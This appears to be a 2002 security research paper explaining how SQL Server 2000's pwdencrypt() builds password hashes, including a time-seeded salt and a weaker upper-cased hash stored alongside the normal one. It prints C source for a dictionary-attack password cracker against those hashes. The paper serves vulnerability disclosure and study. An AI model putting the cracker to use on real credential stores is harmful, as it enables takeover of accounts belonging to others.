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SQL Server uses an undocumented function, pwdencrypt() to produce a hash of the user's
password, which is stored in the sysxlogins table of the master database. This is probably a fairly
common known fact. What has not been published yet are the details of the pwdencrypt()
function. This paper will discuss the function in detail and show some weaknesses in the way
SQL Server stores the password hash. In fact, as we shall see, later on I should be saying,
'password hashes'.
Using Query Analyzer, or the SQL tool of your choice, run the following query
You should get something that looks similar to the following returned.
0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA5449E6
F649BA954AFF4057056D9B
Time
The query
select pwdencrypt('foo')
produces
0x0100544115053E881CA272490C324ECE22BF17DAF2AB96B1DC9A7EAB644BD218
969D09FFB97F5035CF7142521576
select pwdencrypt('foo')
produces
0x0100D741861463DFFF7B5282BF4E5925057249C61A696ACB92F532819DC22ED6B
E374591FAAF6C38A2EADAA57FDF
The two hashes are different and yet the input, ‘foo’, is the same. From this we can deduce that
time must play an important part in the way password hashes are created and stored. The design
reasons behind this will be such that if two people use the same password then their hashes will
be different - thus disguising the fact that their passwords are the same.
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Case
select pwdencrypt('AAAAAA')
which produces
0x01008444930543174C59CC918D34B6A12C9CC9EF99C4769F819B43174C59CC918
D34B6A12C9CC9EF99C4769F819B
Now, we can note that there are probably two password hashes here. If you can't spot it
immediately let me break it down
0x0100
84449305
43174C59CC918D34B6A12C9CC9EF99C4769F819B
43174C59CC918D34B6A12C9CC9EF99C4769F819B
As can be seen, the last 40 characters are the same as the penultimate 40 characters. This
suggests that passwords are stores twice. One of them is the normal case sensitive password
and the other is the upper-cased version of the password. This is not good as any one attempting
to crack SQL passwords now has an easier job. Rather than having to break a case sensitive
password they need only go after the upper-cased version. This reduces the number of
characters they need to attempt considerably.
Clear Salt
From what we know already, that changes in time will produce a change in the hash, there must
be something about time that makes the password hashes different and this information must be
readily available so when someone attempts to login a comparison can be performed against the
hash derived from the password they supply and the hash stored in the database. In the
breakdown of results from pwdencrypt() above the 84449305 portion is this piece of information.
This number is derived in the following fashion. The time () C function is called and used as a
seed passed to the srand() function. srand() sets a start point to be used for producing a series of
(pseudo)random numbers. Once srand is seeded the rand() function is called to produce a
pseudo random number. This number is an integer; however SQL server converts this to a short
and sets it aside. Lets call this number SN1. The rand() function is called again producing another
pseudo random integer which, again, is converted into a short. Let's call this number SN2. SN1
and SN2 are joined to produce an integer. SN1 becoming the most significant part and SN2 the
least significant part : SN1:SN2 to produce a salt. This salt is then used to obscure the password.
The user's password is converted to it's UNICODE version if not already in this form. The salt is
then appended to the end. This is then passed to the crypt functions in advapi32.dll to produce a
hash using the secure hashing algorithm or SHA. The password is then converted to its upper
case form, the salt tacked onto the end and another SHA hash is produced.
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When a user attempts to authenticate to SQL Server several things happen to do this. Firstly SQL
Server examines the password entry for this user in the database and extracts the "salt" -
84449305 - in the example. This is then appended to the password the user supplies when
attempting to log in and a SHA hash is produced. This hash is compared with the hash in the
database and if they match the user is authenticated - and of course if the compare fails then the
login attempt fails.
This is done in the same manner that SQL Server attempts to authenticate users. Of course, by
far the best thing to do is, first off, is attempt to brute force the hash produced from the upper-
cased version. Once this has been guessed then it is trivial to workout the case sensitive
password.
/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// This will perform a dictionary attack against the
// upper-cased hash for a password. Once this
// has been discovered try all case variant to work
// out the case sensitive password.
//
// This code was written by David Litchfield to
// demonstrate how Microsoft SQL Server 2000
// passwords can be attacked. This can be
// optimized considerably by not using the CryptoAPI.
//
// (Compile with VC++ and link with advapi32.lib
// Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
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if(argc !=3)
{
printf("\n\n*** SQLCrack *** \n\n");
printf("C:\\>%s hash passwd-file\n\n",argv[0]);
printf("David Litchfield ([email protected])\n");
printf("24th June 2002\n");
return 0;
}
err = OpenPasswordFile(argv[2]);
if(err !=0)
{
return printf("\nThere was an error opening the password file %s\n",argv[2]);
}
err = CrackPassword(argv[1]);
fclose(fd);
printf("\n\n%d",wd);
return 0;
}
char phash[100]="";
char pheader[8]="";
char pkey[12]="";
char pnorm[44]="";
char pucase[44]="";
char pucfirst[8]="";
char wttf[44]="";
char uwttf[100]="";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int t=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;
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DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
{
return printf("\nThe password hash is too short!\n");
}
hash = hash + 4;
strncpy(pkey,hash,8);
printf("\nRand key\t: %s",pkey);
if(strlen(pkey)!=8)
return printf("%s",lerr);
hash = hash + 8;
strncpy(pnorm,hash,40);
printf("\nNormal\t\t: %s",pnorm);
if(strlen(pnorm)!=40)
return printf("%s",lerr);
strncpy(pucfirst,pucase,2);
sscanf(pucfirst,"%x",&cmp);
}
else
{
return printf("The password hash has an invalid format!\n");
}
printf("\n\n Trying...\n");
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NULL,
NULL,
PROV_RSA_FULL,
CRYPT_NEWKEYSET ))
{
printf("FAILLLLLLL!!!");
return FALSE;
}
while(1)
{
if(!fgets(wttf,40,fd))
return printf("\nEnd of password file. Didn't find the password.\n");
wd++;
len = strlen(wttf);
wttf[len-1]=0x00;
ZeroMemory(uwttf,84);
wp = &uwttf;
sscanf(pkey,"%x",&key);
cnt = cnt - 2;
uwttf[cnt]=x;
cnt++;
t = key << 8;
t = t >> 24;
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x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
uwttf[cnt]=x;
cnt++;
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
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}
}
count = 0;
cnt=0;
return 0;
}
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